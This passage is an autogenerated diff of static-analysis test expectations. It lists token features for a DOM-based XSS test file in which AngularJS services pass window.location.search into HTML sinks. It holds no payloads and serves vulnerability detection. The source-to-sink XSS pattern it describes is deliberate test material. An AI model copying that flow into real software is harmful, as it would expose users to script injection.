    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:27 | xssSinkService2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:27 | xssSinkService2 | contextSurroundingFunctionParameters | ()\n(xssSinkService2) | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:27 | xssSinkService2 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:27 | xssSinkService2 | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:27 | xssSinkService2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | exceptional return of xssSink ... ocent") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | exceptional return of xssSink ... ocent") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | exceptional return of xssSink ... ocent") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | exceptional return of xssSink ... ocent") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | exceptional return of xssSink ... ocent") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | xssSink ... ocent") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | xssSink ... ocent") | contextSurroundingFunctionParameters | ()\n(xssSinkService2) | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | xssSink ... ocent") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | xssSink ... ocent") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:162:13:162:39 | xssSink ... ocent") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | CalleeFlexibleAccessPath | xssSinkService2 | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | contextSurroundingFunctionParameters | ()\n(xssSinkService2) | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:162:29:162:38 | "innocent" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:164:10:164:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:164:10:164:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:164:10:164:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:164:10:164:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:164:10:164:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16689,6 +115632,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:164:18:164:34 | "xssSinkService2" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:164:36 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:164:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:164:36 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:164:36 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:164:36 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16696,6 +115654,76 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:164:37:166:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:19 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:19 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:19 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:19 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | exceptional return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | functio ... l(v); } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | functio ... l(v); } | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | functio ... l(v); } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | functio ... l(v); } | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | functio ... l(v); } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:165:20:165:53 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | contextSurroundingFunctionParameters | ()\n()\n(v) | +| autogenerated/Xss/DomBasedXss/tst.js:165:29:165:29 | v | enclosingFunctionBody | angular 